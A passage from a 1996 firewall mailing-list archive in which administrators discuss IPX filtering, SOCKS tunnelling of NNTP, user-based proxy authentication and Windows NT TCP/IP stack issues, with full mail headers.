/etc/services in the Novell world. The nearest is the lists published on the net of what the various sockets have been found to do. Novell hold but don't publish the official list. If you run IP on a fileserver, you do have a sys:etc/services file, a program called INETD.NLM, and it works identically to the unix variant. Products like FLeX/IP, NFS Gateway fit the bill of IP on a server. >> Are there any IPX/SPX packet filters available? Yes; almost all routers can filter IPX/SPX, and novell themselves do a filter set (called MultiProtocol router) that runs right on the fileserver. A lo cost effective standalone firewall is the karlBridge, commercial version. >> Are there any IPX proxy server firewalls available? Not of which I am aware. >> CJC from Novell mentioned their existence, but gave little other info. >> Of course I'll start by recommending that the market data feed box go >> onto its own ethernet segment, and that IP traffic is not forwarded on >> or off of that segment. To give a reasoned argument I need more detail. I spend my days in the City of London, looking after large multiprotocol networks in financial houses, so should be able to give you an exact answer. Specifically, what does the leased line connect to, a router, the back of the fileserver, and application gateway etc? Whats the name of the service - I may have been thru this one already... (and you may wish to mail me the reply as well, 'cos I don't always have time to read firewalls...) -- ----------------------------------------+------------------------------------ David Buckley of Electric Solutions Ltd | Email: dbuckley@esl.tex.com Services to the Computing,Electronics | and Entertainment industries. | ----------------------------------------------------------------------------- From firewalls-owner Tue Feb 6 12:42:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01539 for firewalls-outgoing; Tue, 6 Feb 1996 12:26:08 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA01532 for ; Tue, 6 Feb 1996 12:26:03 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 15:25:24 EST Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 05 Feb 1996 19:33:42 EST Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQabrd28384; Mon, 5 Feb 1996 19:20:32 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26046 for firewalls-outgoing; Mon, 5 Feb 1996 11:46:49 -0800 (PST) Received: from syr.edu (syr.EDU [128.230.1.49]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26041 for ; Mon, 5 Feb 1996 11:46:44 -0800 (PST) Received: from syru4-109.syr.EDU by syr.edu (8.6.9/CNS) id OAA11093; Mon, 5 Feb 1996 14:46:21 -0500 Message-ID: <3116889F.5FCF@syr.edu> Date: Mon, 05 Feb 1996 14:45:51 -0800 From: Peter Morrissey To: Firewalls@GreatCircle.COM Subject: Novell inside IP Port? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there known TCP/UDP port(s) that support the tunneling of Novell insided IP? Someone recently set up such a tunnel and exposed all our Novell Servers to the Internet. I would like to prevent this from happening in the future. From firewalls-owner Tue Feb 6 13:38:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04802 for firewalls-outgoing; Tue, 6 Feb 1996 13:36:19 -0800 (PST) Received: from chrivb01.cch.com (chrivb01.cch.com [199.14.11.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04797 for ; Tue, 6 Feb 1996 13:36:14 -0800 (PST) Received: by chrivb01.cch.com id AA20841; Tue, 6 Feb 96 15:35:19 CST Received: from mailhub.cch.com(165.181.21.17) by chrivb01 via smap (V1.3mjr) id sma020835; Tue Feb 6 15:35:05 1996 Received: by notes.cch.com (IBM OS/2 SENDMAIL VERSION 1.3.14/1.0) id AA6289; Tue, 06 Feb 96 15:36:58 -0600 Message-Id: <9602062136.AA6289@notes.cch.com> Received: from Computax with "Lotus Notes Mail Gateway for SMTP" id 72523663028188FA862562C8007596D5; Tue, 6 Feb 96 15:36:58 To: firewalls From: "Richard Giering Jr." Date: 6 Feb 96 15:33:51 Subject: RE: RPC Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks for the responses; both on the list and by direct Email. You all provided very good information and I'll be contacting some of those that offered. (blush) Something's I should've known without you having to tell me (like RPC can run over TCP). Now getting the developers to code that way will be interesting. They tend to think they know best even when they don't. Before I embarrass myself again, are there any references that you guys/gals could suggest? Thanks again. Rick Giering CCH Inc. From firewalls-owner Tue Feb 6 14:10:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA06435 for firewalls-outgoing; Tue, 6 Feb 1996 14:06:05 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA06402 for ; Tue, 6 Feb 1996 14:05:53 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 17:04:38 EST Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 15:19:27 EST Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQaaqq17285; Mon, 29 Jan 1996 15:02:25 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA00468 for firewalls-outgoing; Mon, 29 Jan 1996 07:18:06 -0800 (PST) Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA00460 for ; Mon, 29 Jan 1996 07:18:02 -0800 (PST) Received: by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.17) via UUCP id AA00148 ; Mon, 29 Jan 96 10:16:51 -0500 Received: (from bisley@localhost) by sb.lanier.com (8.6.12/8.6.6) id KAA01302 for firewalls@greatcircle.com; Mon, 29 Jan 1996 10:19:19 -0500 From: Brad Isley Message-ID: <199601291519.KAA01302@sb.lanier.com> Subject: Re: USE OF 'MANAGED' INTERNET CONNECTION To: firewalls@greatcircle.com Date: Mon, 29 Jan 1996 10:19:18 -0500 (EST) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > unless the ISP is bonded I wouldnt even think of trusting my ISP to watch > me. What is preferable instead is a 3rd 'expert trusted" party > to watch both my isp and intruders. An ISP if broken into and most usually > are is NOT in a position to administer site security.. Every ISP > I have seen is totally clueless in this respect. I have used services from two providers in Atlanta which not only have clues, but even knew when they were cracked. Then they tracked the sukka down and plugged the hole. Were they cracked without knowing? Probably. Would I trust them? No. But it's not so bleak as some may think. They both are quite knowlegable about security and take it seriously. From firewalls-owner Tue Feb 6 14:47:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07210 for firewalls-outgoing; Tue, 6 Feb 1996 14:29:01 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07205 for ; Tue, 6 Feb 1996 14:28:55 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA03687; Tue, 6 Feb 1996 15:15:18 -0600 Date: Tue, 6 Feb 1996 15:15:18 -0600 From: Sten Drescher Message-Id: <199602062115.PAA03687@grendel.texas.net> To: smithj@rd.qms.com (John Smith) CC: Firewalls@GreatCircle.COM In-reply-to: smithj@rd.qms.com's message of Tue, 6 Feb 96 07:54:56 CST Subject: Re: Socks and Internet News References: <9602061354.AA01952@joker.rd.qms.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk smithj@rd.qms.com (John Smith) said: JS> Is there a way to safely tunnel NNTP through SOCKS? Since I'm JS> having to 'experiment' on our running firewall I want to make sure JS> I get it right without opening 10k new holes. Thanks for any JS> advice. Well, NNTP is a tcp connection, so if you use a newsreader compiled with SOCKS, you shouldn't have any problems. When I was behind a SOCKS firewall, I used emacs Gnus. Initially I just used a SOCKSified tcp.c, and later SOCKSified emacs itself. -- #include /* Sten Drescher */ Unsolicited email advertisements will be proofread for a US$100/page fee. From firewalls-owner Tue Feb 6 14:53:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07537 for firewalls-outgoing; Tue, 6 Feb 1996 14:41:01 -0800 (PST) Received: from mail.telstra.com.au (mail.telstra.com.au [192.148.160.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07525 for ; Tue, 6 Feb 1996 14:40:55 -0800 (PST) Received: from mail_gw.fwall.telecom.com.au(192.148.147.10) by mail via smap (V1.3) id sma012380; Wed Feb 7 03:12:32 1996 Received: from cdn_mail.dn.itg.telecom.com.au(144.135.109.134) by mail_gw.telecom.com.au via smap (V1.3) id sma008898; Wed Feb 7 09:34:41 1996 Received: from cednsw.telecom.com.au. (cede.telecom.com.au [144.132.122.196]) by cdn_mail.dn.itg.telecom.com.au (8.6.11/8.6.9) with ESMTP id JAA12787 for ; Wed, 7 Feb 1996 09:34:41 +1100 Received: (from bwa@localhost) by cednsw.telecom.com.au. (8.6.11/8.6.9) id JAA18385 for firewalls@greatcircle.com; Wed, 7 Feb 1996 09:34:35 +1100 Date: Wed, 7 Feb 1996 09:34:35 +1100 From: Barry Anderson Message-Id: <199602062234.JAA18385@cednsw.telecom.com.au.> To: firewalls@greatcircle.com Subject: MAIL LOOP!!! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk atlanta.net. Lurve them Vaxen... cheers, Barry From firewalls-owner Tue Feb 6 15:08:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07738 for firewalls-outgoing; Tue, 6 Feb 1996 14:46:11 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA07732 for ; Tue, 6 Feb 1996 14:46:06 -0800 (PST) Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQabup11120; Tue, 6 Feb 1996 17:45:24 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA29248; Tue, 6 Feb 96 17:34:34 EST Date: Tue, 6 Feb 1996 17:34:31 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Follow up on Windows 95/NT trying to use firewall DNS Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The shop I was watching where PC's running Windows 95 and Windows NT were trying to unsuccessfully look up NetBios names in the firewall DNS appears to have solved their problem. As I understand it, they used sniffers to determine which machines were connecting to Unix hosts on port 137 and 138, then went to each one of those Windows machines in turn and under Network, Network Bindings, turned off everything except TCP/IP. Of course this won't be a fix if you are running multiple protocols. Now some d00d just sent me mail asking "Has anyone ever told you ... that your weird." Sure. My mom. And everyone who has seen my Sunday morning ritual of drilling holes in water melons and coconuts, and then eating them, in memory of Jeffrey Dahmer. If ah was ritch, ah would be called eccentric, not weird. But then ah is not totally eccentric. Ah would NEVER sniff someone's rear without first asking their permission, because that's not polite among MaNimals. SP, tCED cDm From firewalls-owner Tue Feb 6 15:24:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA09483 for firewalls-outgoing; Tue, 6 Feb 1996 15:21:10 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA09478 for ; Tue, 6 Feb 1996 15:21:06 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id RAA16865 for GreatCircle.COM!firewalls; Tue, 6 Feb 1996 17:12:08 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA15430; 6 Feb 96 17:42:40 CST (Tue) Received: by sonic.nmti.com; id AA21227; Tue, 6 Feb 1996 17:13:22 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602062313.AA21227@sonic.nmti.com.nmti.com> Subject: Re: Survey To: janken@rust.net (Kenneth J. Stephens) Date: Tue, 6 Feb 1996 17:13:22 -0600 (CST) Cc: goertzek@wangfed.com, firewalls@GreatCircle.COM In-Reply-To: <199602061540.KAA18136@Fe3.rust.net> from "Kenneth J. Stephens" at Feb 6, 96 10:40:05 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > If the magazine publishers forced the issue date onto all of their reprints > the vendors would have little use for the reprints. The date stamp would > obsolete > the reprint so quickly that the vendor would look foolish for distributing > old info. In other words the magazine is colluding in a deceptive practice. From firewalls-owner Tue Feb 6 15:39:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07934 for firewalls-outgoing; Tue, 6 Feb 1996 14:49:51 -0800 (PST) Received: from ocean.st.usm.edu (ocean.st.usm.edu [131.95.110.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07929 for ; Tue, 6 Feb 1996 14:49:45 -0800 (PST) Received: (from rafuster@localhost) by ocean.st.usm.edu (8.6.12/8.6.9) id QAA13809 for Firewalls@GreatCircle.COM; Tue, 6 Feb 1996 16:50:45 -0600 Message-Id: <199602062250.QAA13809@ocean.st.usm.edu> Subject: This is a test To: Firewalls@GreatCircle.COM Date: Tue, 6 Feb 1996 16:50:44 -0600 (CST) From: "Raul Arturo Fuster" X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hello everyone. I'm kinda new at this. This is an > assignment for a class. What exaclly is this about. > I believe it is about internet security. If it is not > let me know. > Later. > -- > Raul A. Fuster > rafuster@ocean.st.usm.edu > rafuster@whale.st.usm.edu > http://ocean.st.usm.edu/~rafuster (under construction) > Tel. (601)266-1196 > > "CARPE DIEM" > From firewalls-owner Tue Feb 6 15:53:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08264 for firewalls-outgoing; Tue, 6 Feb 1996 14:57:39 -0800 (PST) Received: from guardian.colonial.com.au (guardian.colonial.com.au [140.168.249.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA08250 for ; Tue, 6 Feb 1996 14:57:31 -0800 (PST) From: pmoen@sbnsw.com.au Received: by guardian.colonial.com.au; id JAA17789; Wed, 7 Feb 1996 09:56:36 +1100 Received: from norman.cmutual.com.au(140.168.8.9) by guardian.colonial.com.au via smap (g3.0.1) id sma017783; Wed, 7 Feb 96 09:56:10 +1100 Received: from redbaron.cmutual.com.au ([140.168.1.5]) by norman.cmutual.com.au (post.office MTA v1.9.1 **** trial license expired ****) with SMTP id AAA29797 for ; Wed, 7 Feb 1996 09:57:33 +1100 Received: from mailgw.sbnsw.com.au by redbaron.cmutual.com.au with SMTP id AA19842 (5.65c/IDA-1.5 for ); Wed, 7 Feb 1996 09:57:27 +1100 Received: by mailgw.sbnsw.com.au; Wed, 7 Feb 96 10:00:58 +1000 Date: Wed, 7 Feb 96 10:00:56 SYD Message-Id: X-Priority: 3 (Normal) To: Subject: Info needed X-Incognito-Sn: 606 X-Incognito-Format: VERSION=2.01a ENCRYPTED=NO Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm after some information on the following products: IBM NetSP Firewall (Secure Network Gateway) Mircosoft NT Firewall i'm really after articles etc. that have been archived etc. and discussions from this group so refs to archives would be great if it is possible. any other info would also be greatly appreciated thanx in advance later Paul From firewalls-owner Tue Feb 6 16:08:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11819 for firewalls-outgoing; Tue, 6 Feb 1996 16:06:10 -0800 (PST) Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA11789 for ; Tue, 6 Feb 1996 16:05:24 -0800 (PST) Received: from cnw06.UUCP (root@localhost) by yarrina.connect.com.au with UUCP id LAA01840 (8.6.12/IDA-1.6 for firewalls@GreatCircle.COM); Wed, 7 Feb 1996 11:04:14 +1100 Received: from mecx05. colesmyer.com.au (mecx05.colesmyer.com.au) by coles.com.au (4.1/SMI-4.1) id AA15094; Wed, 7 Feb 96 10:56:01 EST Received: from meei91 (meei97) by mecx05. colesmyer.com.au (5.0/SMI-4.1) id AA19830; Wed, 7 Feb 1996 10:41:35 +1100 Message-Id: <3117F7B3.3647@mecx05.colesmyer.com.au> Date: Wed, 07 Feb 1996 10:52:03 +1000 From: Graham Jose Organization: Coles Myer Limited X-Mailer: Mozilla 2.0b6a (WinNT; I) Mime-Version: 1.0 To: "firewalls@GreatCircle.COM" Subject: User level firewall / proxy authentication Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there any firewall or proxy server products available that will allow outgoing user authentication based upon a user id, rather than an IP address? Our users are mobile and this makes it difficult to restrict internet access on a per user basis, since their source IP address is likely to change. Thanks, Graham -- Graham Jose, Technical Analyst, Information Systems Security Retail Technology Services, Coles Myer Limited (Australia) Voice: +613 9483 7613 Email: gjose@mecx05.colesmyer.com.au From firewalls-owner Tue Feb 6 16:57:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA14357 for firewalls-outgoing; Tue, 6 Feb 1996 16:43:57 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA14261 for ; Tue, 6 Feb 1996 16:42:29 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id SAA10173; Tue, 6 Feb 1996 18:41:37 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id SAA04240; Tue, 6 Feb 1996 18:41:36 -0600 Posted-Date: Tue, 6 Feb 1996 18:41:36 -0600 Date: Tue, 6 Feb 1996 18:41:35 -0600 (CST) From: Ron DuFresne To: Graham Jose cc: "firewalls@GreatCircle.COM" Subject: Re: User level firewall / proxy authentication In-Reply-To: <3117F7B3.3647@mecx05.colesmyer.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Graham Jose wrote: > Are there any firewall or proxy server products available that will allow > outgoing user authentication based upon a user id, rather than an IP address? > > Our users are mobile and this makes it difficult to restrict internet access on a > per user basis, since their source IP address is likely to change. > This sounds pretty unsafe! How do you prevent me from spoofing one of your users? Later, Ron Dufresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Tue Feb 6 17:24:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA15628 for firewalls-outgoing; Tue, 6 Feb 1996 17:07:20 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA15623 for ; Tue, 6 Feb 1996 17:07:14 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA02437; Tue, 6 Feb 96 19:03:59 CST Date: Tue, 6 Feb 96 19:03:59 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602070103.AA02437@garrison.com.> To: firewalls@greatcircle.com Subject: NT's TCP/IP stack Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As we have all seen in the last few weeks, there have been several people who have been ragging on Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find. NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.. I would be very interested in hearing about these issues. Jeromie Jackson Director of Technology Garrison Associates jeromie@garrison.com From firewalls-owner Tue Feb 6 17:46:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA16866 for firewalls-outgoing; Tue, 6 Feb 1996 17:37:45 -0800 (PST) Received: from ocean.st.usm.edu (ocean.st.usm.edu [131.95.110.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA16861 for ; Tue, 6 Feb 1996 17:37:40 -0800 (PST) Received: (from rafuster@localhost) by ocean.st.usm.edu (8.6.12/8.6.9) id TAA20459 for firewalls@GreatCircle.COM; Tue, 6 Feb 1996 19:38:42 -0600 Message-Id: <199602070138.TAA20459@ocean.st.usm.edu> Subject: hello To: firewalls@GreatCircle.COM Date: Tue, 6 Feb 1996 19:38:41 -0600 (CST) From: "Raul Arturo Fuster" X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello everyone. I don't know if you got my last msg. I am doing this as a class assignment and I would like to know a little bit more about this mailing list. I have the notion that this is about Net security. If it is what kind of security is it about. Just let me know a little more. Later. -- Raul A. Fuster rafuster@ocean.st.usm.edu rafuster@whale.st.usm.edu http://ocean.st.usm.edu/~rafuster (under construction) Tel. (601)266-1196 "CARPE DIEM" From firewalls-owner Tue Feb 6 19:53:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA21471 for firewalls-outgoing; Tue, 6 Feb 1996 19:51:51 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA21466 for ; Tue, 6 Feb 1996 19:51:47 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id WAA11254; Tue, 6 Feb 1996 22:48:16 -0500 Date: Tue, 6 Feb 1996 22:48:12 -0500 (EST) From: Rabid Wombat To: Raul Arturo Fuster cc: firewalls@greatcircle.com Subject: More Firewalls info (was hello:) In-Reply-To: <199602070138.TAA20459@ocean.st.usm.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This mailing list is primarily devoted to the discussion of firewalls, devices which restrict access between two (or more) networks, (often between a private network and Internet). For more information, see: The archives of this mailing list: http://www.greatcircle.com/firewalls/archive/ The firewalls FAQ @ Ohio State: http://www.cis.ohio-state.edu/hypertext/faq/usenet/firewalls-faq/faq.html A good collection of links: http://www.willamette.edu/~dlabar/firewall.html or read Chapman and Zwicky Building Internet Firewalls http://www.greatcircle.com/firewalls-book/ Cheswick and Bellovin Firewalls and Internet Security - Repelling the Wily Hacker http://www.aw.com/cp/Ches.html ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- On Tue, 6 Feb 1996, Raul Arturo Fuster wrote: > Hello everyone. I don't know if you got my last msg. > I am doing this as a class assignment and I would like > to know a little bit more about this mailing list. > I have the notion that this is about Net security. > If it is what kind of security is it about. > Just let me know a little more. > Later. > -- > Raul A. Fuster > rafuster@ocean.st.usm.edu > rafuster@whale.st.usm.edu > http://ocean.st.usm.edu/~rafuster (under construction) > Tel. (601)266-1196 > > "CARPE DIEM" > From firewalls-owner Tue Feb 6 22:08:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA25562 for firewalls-outgoing; Tue, 6 Feb 1996 21:57:26 -0800 (PST) Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA25548 for ; Tue, 6 Feb 1996 21:57:19 -0800 (PST) Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA252; Wed, 7 Feb 1996 00:56:25 -0500 Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca>; Wed, 7 Feb 1996 00:55:01 -0500 Message-ID: <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca> From: Russ To: "'Jeromie Jackson'" Cc: "'Firewalls'" Subject: RE: NT's TCP/IP stack Date: Wed, 7 Feb 1996 00:54:59 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You should probably be more specific in your request for information. For example, would you like me to list the bugs in the TCP/IP stack for; v3.5 no Service Packs (SP) v3.5 SP1 v3.5 SP2 v3.5 SP3 (C2 compliant without networking) v3.51 no SP v3.51 SP1 v3.51 SP2 v3.51 SP3 v3.51 SP3 with SRV.SYS Hot Fix or v3.51 SP4 (due out in the next 10 days) or v4.0 (due out in the next few months) Considering that these releases we all made in the last 18 months, its quite conceivable that you could encounter one, or all, of these environments. This, I think, might be the biggest problem here. This list only outlines the Microsoft releases, in addition to these, you have all the releases of driver software from the various NIC vendors to deal with. Add Systems Management Server (which has a network monitor component that adds to the stack functionality and exploits embedded RMON in NT Servers it connects to), various server products which add performance meters for various IP related tasks (Web servers that track number of hits on HTTP, for example). Then couple that with numerous registry entries which can be manipulated by the Administrator for various performance gains (or losses, depending on the Admin ;-]). Oh, and by the way, you could be talking about a network interface entity that includes not only IP, but NetBeui, IPX, AppleTalk, DLC (hmmm, I feel like I'm missing a protocol here)... Its extremely difficult to talk about a "generic" IP stack for Windows NT, which may explain the lack of interest or insight into its secure nature. For now, sites pretty well have to be taken on a case by case basis with certain "generic" principles being applied initially, and then some real work and imagination. For these reasons alone, I can see why "secure" types (what name did we end up with again? -- no, please don't remind me) have issues with its wide-spread use in secure environments. Of course, there is also the issue that whenever MS releases a Service Pack, they give you a nice list of all the bugs they fixed. What they don't tell you is that they don't always list all of the fixed items. They also don't tell you (how could they) all the things they broke while fixing things. The end result is, you would have to go back and apply your tests to see if your security is still intact. [Firewall relevance] To some extent, there may be some relief to all of this on the horizon. With the introduction of Raptor and soon Network-1 into the Windows NT realm of Firewalls, there are seriously security conscious individuals who will have to track these changes to see if they affect their product. Hopefully this will lead to increased scrutiny of the product from a specifically secure standpoint. [Shameless plug] Of course, with the just announced strategic partnership between MCI and Microsoft (and of course, SHL), and the fact that MCI will be hosting MSN on the Internet, we will hopefully see lots more NT boxes on the Internet, again, forcing people to look more closely at the viability of securing NT boxes. There's definitely something wrong with someone like me who lives for these types of questions, I guess I just love the controversy! ;-] Cheers, Russ Cooper - Senior Consultant - Internet SHL/Computer Innovations - Consulting Services "Do you have the vision to see my future as I projected it?" From firewalls-owner Wed Feb 7 03:38:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA04652 for firewalls-outgoing; Wed, 7 Feb 1996 03:27:54 -0800 (PST) Received: from uu9.psi.com (uu9.psi.com [38.145.107.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA04647 for ; Wed, 7 Feb 1996 03:27:50 -0800 (PST) Received: from infosys.inf.COM by uu9.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; id AA06746 for firewalls@greatcircle.com; Wed, 7 Feb 96 06:26:43 -0500 Received: by Inf.COM (4.1/SMI-4.1) id AA24690; Wed, 7 Feb 96 06:24:04 EST Received: from unknown(204.4.59.106) by infosys.inf.COM via smap (V1.3) id sma024622; Wed Feb 7 06:23:30 1996 Received: from cc:Mail by smtp_gw.inf.com id AA823691133; k G~87 07 Feb 95 12:20:06 EST Date: k G~87 07 Feb 95 12:20:06 EST From: "SATEESHB" Message-Id: <9601078236.AA823691133@smtp_gw.inf.com> To: firewalls@greatcircle.com, jeromie@garrison.com (Jeromie Jackson), winnt-l@eva.dc.lsoft.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk well, I don't know how relevant is the reply to your needs. I faced problems with NetManage Chameleon version 5.0 .It starts a program called NEWT(NetManage Enhanced Windows Tcp/IP). When I try to run one of my programs which is a service from service control panel, it hangs.Even that cute messagebox "Attempting to start Service " with the small clock also doesn't come up. After wasting many hours and losing sleep, I found out that if I rename NEWT.exe to some other name so it would fail to get loaded automatically, the SCM behaves properly. I feel, NEWT tcp/ip might be conflicting with NT TCP/IP. Why should NetManage guys have a different program for this when NT provides one is beyond my comprehension. It would be of help to me if some one can tell me how is Service Control Manager is related to TCP/IP here?.(Is it something to do with RPC stuff they talk about for starting services remotely?.In my case I started locally). Any discussion on NT TCP/IP stack will be greatly appreciated. Regards, Sateesh Babu N S, Systems Analyst, Infosys Technologies Ltd, Bangalore India. ______________________________ Reply Separator _________________________________ Subject: NT's TCP/IP stack Author: jeromie@garrison.com (Jeromie Jackson) at SMTP_GW Date: 2/6/96 7:03 PM As we have all seen in the last few weeks, there have been several people who have been ragging on Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find. NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.. I would be very interested in hearing about these issues. Jeromie Jackson Director of 